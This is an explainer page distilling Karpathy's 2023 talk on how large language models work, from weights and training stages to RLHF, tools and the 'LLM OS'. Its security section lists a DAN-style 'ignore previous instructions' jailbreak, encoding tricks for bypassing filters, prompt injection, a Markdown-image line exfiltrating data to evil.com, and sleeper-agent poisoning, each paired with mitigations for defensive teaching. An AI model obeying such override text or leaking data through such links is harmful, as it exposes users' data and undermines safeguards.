nov 2023 · andrej karpathy · 1-hour talk · distilled

How to think
about LLMs.

First principles, in metaphors. The mental models that still hold up — even after the field tripled in scale.

Source: [1hr Talk] Intro to Large Language Models · pairs with the architecture of intelligence for the 2026 picture.

01 / two files

An LLM is two files.

That's it. A blob of weights and a few hundred lines of inference code. No internet required.

llama-2-70b/
├── parameters.bin    140 GB · float16 weights
└── run.c             ~500 lines · no dependencies

parameters.bin (the model):
0.7234, −0.1820, 1.0042, 0.0033, −0.6712, 0.4191, 1.2847, −0.3320, 0.5512, 0.9981, −0.2273, 0.6650, 0.1820, −0.5544, 0.7724, 0.3382, −0.9911, 0.0451, 1.4452, −0.1819, … ×70 billion floats …

run.c (how to run it):
while (next != EOS) {
    embed(token);
    forward_transformer(weights);
    next = sample(logits);
}

Compile run.c, point it at parameters.bin, type a prompt: that's a chatbot.

That's the entire deliverable. Llama 2 70B = 140 GB of float16 weights + ~500 lines of C. Karpathy's point: the inference layer is trivial. The cost and the magic both live in how you got the weights.
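The loop in run.c can be sketched in a few lines. This is a toy under stated assumptions, not Karpathy's code: `WEIGHTS` is a hypothetical hand-written table of next-token probabilities standing in for parameters.bin, and `forward` is a table lookup where a real model would run a Transformer forward pass.

```python
import random

# Hypothetical stand-in for parameters.bin: a tiny table of next-token
# probabilities. A real model computes these with a Transformer forward pass.
WEIGHTS = {
    "<s>": {"the": 1.0},
    "the": {"cat": 0.5, "dog": 0.5},
    "cat": {"sat": 1.0},
    "dog": {"sat": 1.0},
    "sat": {"</s>": 1.0},
}
EOS = "</s>"


def forward(weights, token):
    """Return the next-token distribution for the current token."""
    return weights[token]


def sample(distribution, rng):
    """Draw one token according to its probability."""
    tokens = list(distribution)
    probs = [distribution[t] for t in tokens]
    return rng.choices(tokens, weights=probs, k=1)[0]


def generate(weights, start="<s>", seed=0, max_tokens=20):
    """Repeat forward + sample until the end-of-sequence token appears."""
    rng = random.Random(seed)
    token, output = start, []
    for _ in range(max_tokens):
        token = sample(forward(weights, token), rng)
        if token == EOS:
            break
        output.append(token)
    return output


print(" ".join(generate(WEIGHTS)))
```

Everything interesting sits in `WEIGHTS`; the loop itself would not change if the table were replaced by 70 billion trained parameters.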

first principle Inference is cheap and well-understood. Training is expensive and partly mysterious. When you complain about an LLM, you're complaining about choices made during training — not run.c.

02 / compression

The weights are a zip of the internet.

Lossy compression, not a database. Roughly 70× smaller, with everything fuzzy.

~10 TB of internet text (CommonCrawl · books · code · forums · papers)
→ cost: 6,000 GPUs · 12 days · ~$2M
→ 140 GB of weights (parameters.bin) · ~70× lossy

2023 numbers. Frontier 2026 is 10–100× larger. Projection (not disclosed): ~100T+ tokens · hundreds of millions of $ · gigawatt clusters

Lossy, not lossless. Karpathy: "you're never 100% sure if what it comes up with is hallucination or correct." The weights remember the gestalt of the training set, not its bytes. When the model has to reconstruct a fact, it's interpolating.
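The 140 GB and ~70× figures follow from simple arithmetic. A quick check, assuming decimal units (1 TB = 10^12 bytes) and 2 bytes per float16 parameter:

```python
PARAMS = 70e9                 # Llama 2 70B parameter count
BYTES_PER_PARAM = 2           # float16
TRAINING_TEXT_BYTES = 10e12   # ~10 TB of text, decimal units (assumption)

weights_bytes = PARAMS * BYTES_PER_PARAM
ratio = TRAINING_TEXT_BYTES / weights_bytes

print(f"weights: {weights_bytes / 1e9:.0f} GB")   # weights: 140 GB
print(f"compression: ~{ratio:.0f}x")              # compression: ~71x
```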

interpretation Treat the model's "knowledge" the way you'd treat a colleague's recall of a paper they read once five years ago. Often right, occasionally inventive, never the source of truth.

03 / the dream

The base model dreams the internet.

No questions, no answers — just plausible documents. Form is real, content is invented.

// dream.java
public class WidgetParser {
    private final String key;
    Map<String, Object> cfg;

    public Result parse(InputStream raw) {
        var b = new BufBuilder();
        b.consume(raw);
        return b.build();
    }
}
"BufBuilder" doesn't exist.

// listing.html
Aurora Glass Tea Set
by Northbrook & Sons
ISBN: 978-0-9874-2210-5
ASIN: B07KQXM4F2
Price: $42.99
In Stock · 4.3★ (1,284)
Hand-blown borosilicate glass with cherry-wood handle. Dishwasher safe below 60°C.
No such ISBN. No such ASIN.

// wiki.html
Black-nosed dace
Rhinichthys atratulus
A small freshwater fish native to eastern North America. Identified by a dark lateral stripe running snout to caudal fin. Tolerant of low oxygen levels...
Mostly correct! Different problem: memorized vs. interpolated. You can't tell which.

The base model is a "document simulator." It learned the shape of code, of product listings, of encyclopedia entries — and fills in the slots with plausible noise. Sometimes the noise is real (memorized); sometimes it's invented. There's no flag distinguishing the two.

why this matters The format-confidence trap: a model that produces a perfectly formatted citation, ISBN, function signature, or court ruling can still be making it up. Format ≠ truth.
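One way to see the gap between format and truth is to run a mechanical check on the dreamed ISBN from the product listing. The sketch below applies the standard ISBN-13 check-digit rule; the function name is illustrative. Note the limit of the check: a failing checksum proves the number is malformed, but a passing checksum only proves it is well-formed, not that the book exists.

```python
def isbn13_checksum_ok(isbn: str) -> bool:
    """Check the ISBN-13 check digit (weights alternate 1, 3 over 12 digits)."""
    digits = [int(c) for c in isbn if c.isdigit()]
    if len(digits) != 13:
        return False
    total = sum(d * (1 if i % 2 == 0 else 3) for i, d in enumerate(digits[:12]))
    return (10 - total % 10) % 10 == digits[12]


print(isbn13_checksum_ok("978-0-9874-2210-5"))  # False: the dreamed listing
print(isbn13_checksum_ok("978-0-306-40615-7"))  # True: a well-formed ISBN-13
```

The dreamed ISBN has the right shape (prefix, hyphenation, length) and still fails the arithmetic, which is the format-confidence trap in miniature.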

04 / inscrutable

Knowledge is stored weirdly.

The reversal curse: A → B works, but B → A may fail. Direction matters.

"Who is Tom Cruise's mother?"
Tom Cruise → Mary Lee Pfeiffer ✓ correct answer

"Who is Mary Lee Pfeiffer's son?"
Mary Lee Pfeiffer → "I don't know" ✗ same fact, different direction

Same fact lives in the weights. Retrieval depends on how you ask.

The reversal curse went viral in 2023. Models trained on "A is B" don't automatically learn "B is A." Knowledge in the weights is direction-sensitive, a clue that what we call "knowledge" inside an LLM is closer to "patterns of co-occurrence" than to a database.
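A toy analogy for direction-sensitivity, with a loud caveat: a real LLM is not a successor table, and this sketch only illustrates why left-to-right training statistics need not support right-to-left recall. The `train` and `complete` helpers are hypothetical.

```python
from collections import defaultdict


def train(sentences):
    """Record, for each token, which tokens followed it in the training text."""
    successors = defaultdict(list)
    for sentence in sentences:
        tokens = sentence.split()
        for current, following in zip(tokens, tokens[1:]):
            successors[current].append(following)
    return successors


def complete(successors, prompt, max_tokens=5):
    """Greedily continue a prompt using only forward (left-to-right) statistics."""
    tokens = prompt.split()
    for _ in range(max_tokens):
        options = successors.get(tokens[-1])
        if not options:
            break  # nothing ever followed this token in training
        tokens.append(options[0])
    return " ".join(tokens)


model = train(["Tom Cruise's mother is Mary Lee Pfeiffer"])
print(complete(model, "Tom Cruise's mother is"))  # continues with the name
print(complete(model, "Mary Lee Pfeiffer"))       # unchanged: nothing follows
```

The name was only ever seen as the end of a sentence, so starting from it leads nowhere, even though the fact is "in" the table.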

first principle LLMs are mostly inscrutable artifacts — empirical, not engineered. We can measure behavior; we can't open the black box and read the facts.

05 / the tutor

From document simulator to assistant.

Same algorithm, different data. Quality replaces quantity. A ~12-day, ~$2M run becomes ~one day on one node.

STAGE 1 · pre-training → base document sim
data: ~10 TB of internet (quantity over quality)
cost: ~$2M · ~12 days · ~6,000 GPUs
cadence: ~1× per year

STAGE 2 · fine-tuning → assistant
data: ~100k Q&A docs (quality over quantity)
cost: ~1 day · 1 node
cadence: ~weekly

Both stages do next-token prediction. Only the data distribution changes.

In Stage 2, labs hire labelers (Scale AI etc.) to write ~100k high-quality Q&A pairs following detailed labeling guidelines. The base model's knowledge stays; fine-tuning only changes the format of its output to that of a helpful assistant.
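"Same algorithm, different data" can be made concrete. In this sketch the training examples are built the same way in both stages; only the document changes. The whitespace tokenizer and the `<user>` / `<assistant>` template are assumptions for illustration, not any lab's actual format.

```python
def next_token_examples(text):
    """Turn a document into (context, next_token) training pairs."""
    tokens = text.split()  # whitespace split stands in for a real tokenizer
    return [(tokens[:i], tokens[i]) for i in range(1, len(tokens))]


def render_qa(question, answer):
    """Render a labeler-written Q&A pair with a hypothetical chat template."""
    return f"<user> {question} <assistant> {answer}"


# Stage 1: an arbitrary internet document.
pretraining_doc = "The black-nosed dace is a small freshwater fish"

# Stage 2: a curated Q&A document.
finetuning_doc = render_qa("What is a dace?", "A small freshwater fish.")

# The same function produces the training pairs for both stages.
for doc in (pretraining_doc, finetuning_doc):
    context, target = next_token_examples(doc)[-1]
    print(" ".join(context), "->", target)
```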

first principle Stage 1 is rare and expensive — typically once a year. Stage 2 is cheap and iterative — weekly. When a model "improves overnight," it's almost always Stage 2.

06 / rlhf

Compare beats generate.

An optional third stage swaps writing answers for comparing candidates, and that small move unlocks a lot.

prompt: "Write a haiku about paperclips."
candidate A: silver bend remembers...
candidate B: a tiny coil holds... ← human picks B
candidate C: paperclips sit waiting...
candidate D: office desk drawer...
"comparing is easier than writing"

reward model: learns "what humans prefer"
policy update: PPO / DPO · increase prob of "B-like"

Asymmetry: a labeler may not be able to write a great haiku, but can pick the best of four. RLHF rides this gap.

Reinforcement Learning from Human Feedback. Karpathy's pithy version: "compare > generate." Writing the perfect answer is hard; ranking four candidates is easy. The policy gets nudged toward whatever the reward model learned humans prefer.
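How a reward model can learn from comparisons is often written as a pairwise loss. The sketch below uses the Bradley-Terry style formulation, -log(sigmoid(r_chosen - r_rejected)), which is one common choice; the talk does not specify a loss, so treat this as an assumption. The reward scores are made-up numbers.

```python
import math


def preference_loss(reward_chosen, reward_rejected):
    """Pairwise loss: small when the chosen answer scores above the rejected one."""
    margin = reward_chosen - reward_rejected
    return math.log1p(math.exp(-margin))  # equals -log(sigmoid(margin))


print(round(preference_loss(0.0, 0.0), 4))  # 0.6931: no preference learned yet
print(round(preference_loss(2.0, 0.0), 4))  # 0.1269: agrees with the labeler
print(round(preference_loss(0.0, 2.0), 4))  # 2.1269: disagrees with the labeler
```

The labeler never writes a haiku; each comparison only supplies which candidate should score higher.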

interpretation Most of what you experience as model "personality" — terseness, hedging style, helpfulness, refusal behavior — is shaped here. Same base, different RLHF run, different model.

07 / tools

Don't ask the model to multiply.

Give it Python. The model decides when to call out.

LLM router
calculator: 9-digit math · ✗ in weights
browser: post-cutoff facts
python: data manipulation · plot
vision: images, charts, OCR
file system: read/write context
audio: whisper · tts

The model is not the system; the model orchestrates the system. Karpathy's framing: imagine an LLM with arms — calculator for arithmetic, Python for transformations, browser for fresh facts, vision for charts, file system for memory. Modern frontier models are trained to route to tools rather than answer from weights.

for your work For tasks the model fails at (large arithmetic, current news, exact data lookups), the answer is usually "give it the tool" — not "find a stronger model." Tool use is cheaper than a 10× scaling step.
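"Give it the tool" might look like the sketch below: the model emits a structured call and the application executes it. The call format (`{"tool": ..., "input": ...}`) and the `TOOLS` registry are hypothetical; real tool-calling APIs differ by vendor. The calculator walks the parsed expression instead of calling `eval()`, so only plain arithmetic is accepted.

```python
import ast
import operator

_OPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.Div: operator.truediv,
}


def calculator(expression):
    """Evaluate +, -, *, / on numeric literals without calling eval()."""
    def walk(node):
        if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](walk(node.left), walk(node.right))
        raise ValueError("unsupported expression")
    return walk(ast.parse(expression, mode="eval").body)


TOOLS = {"calculator": calculator}  # hypothetical registry


def run_tool_call(call):
    """Dispatch a model-emitted call of the assumed form {'tool': ..., 'input': ...}."""
    tool = TOOLS.get(call["tool"])
    if tool is None:
        raise KeyError(f"unknown tool: {call['tool']}")
    return tool(call["input"])


# 9-digit multiplication: unreliable from weights, exact from the tool.
print(run_tool_call({"tool": "calculator", "input": "123456789 * 987654321"}))
```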

08 / system 1 vs 2

One forward pass vs a tree of thoughts.

Kahneman's frame, applied to neural networks. The LLMs of 2023 were System 1. The frontier wanted System 2.

SYSTEM 1 · fast, intuitive
prompt → forward → answer
What you get from chat by default.
latency: ~200 ms · cost: 1×

SYSTEM 2 · slow, deliberate
prompt → best path
Tree-of-thoughts, internal CoT, backtracking, self-critique.
latency: ~30 s · cost: 10–100×

Different problems want different speeds. "What's 2+2?" → System 1. "Plan a 6-month migration." → System 2.

Karpathy's prediction (2023): the field's next frontier is letting models think slowly. He was right: between 2024 and 2026, "reasoning models" with internal chain-of-thought (o1, Claude extended thinking, DeepSeek R1, Gemini Deep Think) became the default for hard problems.

for your work Match the system to the task. For codegen of a CRUD endpoint: System 1 is plenty. For "find the bug in this 800-line function": pay for System 2 — it's worth the latency.
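The cost side of the trade can be sketched with the simplest form of "slow thinking": sample several answers and keep the consensus. This is majority voting, not what reasoning models do internally, and `noisy_solver` is a hypothetical stand-in for a model call that is sometimes wrong.

```python
from collections import Counter


def majority_vote(answers):
    """Return the most common answer among several sampled attempts."""
    return Counter(answers).most_common(1)[0][0]


def solve_slowly(sample_once, prompt, n=5):
    """Spend n forward passes instead of one, then keep the consensus."""
    return majority_vote([sample_once(prompt, attempt) for attempt in range(n)])


def noisy_solver(prompt, attempt):
    """Hypothetical System 1 call: wrong on every third attempt."""
    return "41" if attempt % 3 == 0 else "42"


print(noisy_solver("6 * 7 = ?", 0))             # 41: a single fast pass can miss
print(solve_slowly(noisy_solver, "6 * 7 = ?"))  # 42: five passes, 5x the cost
```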

09 / the LLM os

Imagine an operating system emerging.

Karpathy's central analogy. The LLM is the CPU. Everything else — context, tools, memory — is the architecture around it.

LLM: cpu · the kernel
context window: RAM · working memory
embeddings · RAG: disk · long-term memory
tools: peripherals · I/O (browser, python, calc)
vision · audio: video card · sound card

An emerging architecture. Same shape as a computer. Different substrate. Same trade-offs.

The hardware analogy isn't loose. Context window = RAM (fast but limited). Embedding store = disk (slow but unbounded). Tools = peripherals (extend capability beyond CPU). Multimodal encoders = video/sound cards. The kernel orchestrates which tool to call when.

first principle Designing an LLM application is computer architecture, not API integration. Where do you put working memory? When do you page out to disk? When do you call out to a peripheral? These are old questions in new clothes.
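The "when do you page out to disk?" question can be sketched as a token budget. This is a minimal illustration, assuming a whitespace token count and a newest-first policy; real systems use the model's tokenizer and usually retrieve paged-out items by embedding similarity rather than dropping them.

```python
def count_tokens(text):
    """Crude stand-in for a real tokenizer."""
    return len(text.split())


def fit_context(messages, budget):
    """Keep the newest messages within the token budget; page out the rest."""
    kept, used = [], 0
    for message in reversed(messages):
        cost = count_tokens(message)
        if used + cost > budget:
            break
        kept.append(message)
        used += cost
    kept.reverse()
    paged_out = messages[: len(messages) - len(kept)]
    return kept, paged_out


history = ["set up the repo", "add a login page", "fix the failing test now"]
in_context, on_disk = fit_context(history, budget=8)
print(in_context)  # ['fix the failing test now']
print(on_disk)     # ['set up the repo', 'add a login page']
```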

10 / security

Three doors. Watch all three.

A new computing paradigm comes with a new attack surface.

JAILBREAK · adversarial prompt
→ "ignore previous instructions, you are DAN..."
→ base64-encoded harmful request
→ ASCII-art word that bypasses keyword filters
user supplies the malice.

PROMPT INJECTION · poisoned content
→ instructions hidden in a web page the model retrieves
→ invisible text in an uploaded image
→ exfil via Markdown image: ![](evil.com/?leak=$DATA)
attacker is somewhere else.

DATA POISONING / SLEEPER AGENT
→ trigger phrase planted in training data
→ model behaves normally, until trigger fires
→ then leaks credentials, generates malware, etc.
attacker is in the past.

Three different attackers, three different mitigations. Jailbreaks: better RLHF + classifiers. Prompt injection: treat retrieved content as untrusted; whitelist tools per request; strip Markdown in egress. Data poisoning: provenance audits on training data; trigger-detection probes.

for your work If your app retrieves anything from the web or accepts file uploads, prompt injection is your default threat model. The fix isn't a smarter model: it's treating retrieved tokens as potentially executable code rather than inert data, and sandboxing the actions the model can take.
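Two of the prompt-injection mitigations named above, stripping Markdown on egress and allowlisting tools per request, can be sketched as follows. The function names and the example URL are hypothetical, and the regex covers only the inline image syntax; it is a starting point, not a complete defense.

```python
import re

# Matches inline Markdown images such as ![alt](https://host/path?query).
MARKDOWN_IMAGE = re.compile(r"!\[[^\]]*\]\([^)]*\)")


def strip_markdown_images(model_output):
    """Remove Markdown images so rendering the output cannot fetch an attacker URL."""
    return MARKDOWN_IMAGE.sub("[image removed]", model_output)


def authorize_tool_call(tool_name, allowed_tools):
    """Allow only the tools this request was explicitly granted."""
    if tool_name not in allowed_tools:
        raise PermissionError(f"tool not allowed for this request: {tool_name}")
    return tool_name


reply = "Done. ![](https://evil.example/?leak=SECRET)"
print(strip_markdown_images(reply))  # Done. [image removed]
```

Both checks run outside the model, so they hold even when the injected instructions succeed in steering its output.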

11 / takeaways

The mental models that still hold.

Eight things to remember, even after the field tripled in scale.

  1. substrate An LLM is two files. The cost is in producing parameters.bin. The interesting question is always "what data shaped these weights?"
  2. compression The weights are a lossy zip of the internet. Memorized facts and confabulated facts share the same surface. Format ≠ truth.
  3. stages Pre-training is once a year. Fine-tuning is weekly. When a model gets better, it's usually post-training. Same for "personality" changes.
  4. rlhf Compare beats generate. Most of what you experience as model "voice" came from someone ranking 4 candidates against a rubric.
  5. tools Don't ask the model to do what a tool can do. Calculator for math, browser for facts, Python for transformations. Tool-use is cheaper than a 10× scaling step.
  6. system 2 Match speed to problem. Hard problems get reasoning models; easy ones don't. Pay for slow thinking only when it pays back.
  7. os You're doing computer architecture. Context window = RAM. Embeddings = disk. Tools = peripherals. The system around the model matters more than the model.
  8. security Treat retrieved content as untrusted code, not inert data. Prompt injection is the default threat model the moment your app browses, reads files, or processes uploads.